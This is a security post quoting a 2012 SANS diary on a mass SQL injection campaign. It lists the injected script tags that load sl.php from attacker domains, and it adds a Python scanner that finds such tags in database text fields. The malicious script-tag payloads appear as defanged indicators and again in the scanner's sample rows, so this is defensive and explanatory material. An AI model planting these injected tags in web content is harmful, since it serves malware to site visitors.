FYI...
SQL injection... "lasimp04risioned"
- https://isc.sans.edu/diary.html?storyid=13813
Last Updated: 2012-07-31 21:47:00 UTC - "It's been a while since we published the diary about the lilupophilupop SQL injection ( https://isc.sans.edu/diary.html?storyid=12127 ) that back in January had infected LOTS of web sites. But guess what, they are b-aaa-ck, and are trying pretty much the same thing... decoded looks as...
<script src="http ://lasimp04risioned. rr.nu/sl.php"></script> ...
Searching for the injected "lasimp04risioned" URL via Google shows that the bad guys don't seem to be as 'successful' with this attack as last time, but this can change..."
2012-08-01 11:55:15 UTC: https://isc.sans.edu/diary.html?storyid=13813#comment
(Also seen) ... <script src="http ://xinthesidersdown .com/sl.php"></script> ...
2012-08-02 16:29 UTC: https://isc.sans.edu/diary.html?storyid=13813#comment
... hxxp: //eighbo02rsbarr. rr.nu/sl.php...
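A defender-side check for the injected tag quoted above, as an added example that is not part of the original post or the ISC diary: it scans stored text fields for off-site script tags that load `/sl.php`. The row layout, `OWN_HOSTS` and the function names are assumptions, and the sample rows are constructed from the defanged URLs in this post.

```python
import re
from urllib.parse import urlsplit

# Matches <script src="..."></script>, tolerating the spaces that
# defanged write-ups insert ("http ://host. tld/...").
SCRIPT_SRC = re.compile(
    r'<script\b[^>]*?\bsrc\s*=\s*["\']([^"\']+)["\'][^>]*>\s*</script\s*>',
    re.IGNORECASE,
)

def refang(url):
    """Undo common defanging: embedded spaces, [.] -> '.', hxxp -> http."""
    url = re.sub(r"\s+", "", url).replace("[.]", ".")
    return re.sub(r"^hxxp", "http", url, flags=re.IGNORECASE)

def find_injected_scripts(rows, own_hosts, path_suffix="/sl.php"):
    """Return (table, row_id, host) for each off-site script tag whose
    path ends in path_suffix, found in stored text fields."""
    hits = []
    for table, row_id, value in rows:
        for match in SCRIPT_SRC.finditer(value):
            try:
                parts = urlsplit(refang(match.group(1)))
            except ValueError:
                continue  # unparseable src, nothing to compare
            host = (parts.hostname or "").lower()
            if not host or host in own_hosts:
                continue  # relative URL or first-party script
            if parts.path.lower().endswith(path_suffix):
                hits.append((table, row_id, host))
    return hits

# Constructed sample rows: (table, primary key, text column value).
OWN_HOSTS = {"www.example.org"}  # assumption: the site's own hostnames
SAMPLE_ROWS = [
    ("products", 1, 'Blue widget<script src="http ://lasimp04risioned. rr.nu/sl.php"></script>'),
    ("products", 2, "Red widget"),
    ("pages", 7, '<script src="/js/site.js"></script><p>About us</p>'),
    ("pages", 9, 'News<SCRIPT SRC="http ://xinthesidersdown .com/sl.php"></SCRIPT>'),
    ("pages", 10, '<script src="https://www.example.org/sl.php"></script>'),
]

if __name__ == "__main__":
    for hit in find_injected_scripts(SAMPLE_ROWS, OWN_HOSTS):
        print(hit)
```

Matching on the path rather than a fixed host list also catches the later hostnames reported in the diary comments, since all of them serve the same `sl.php` path.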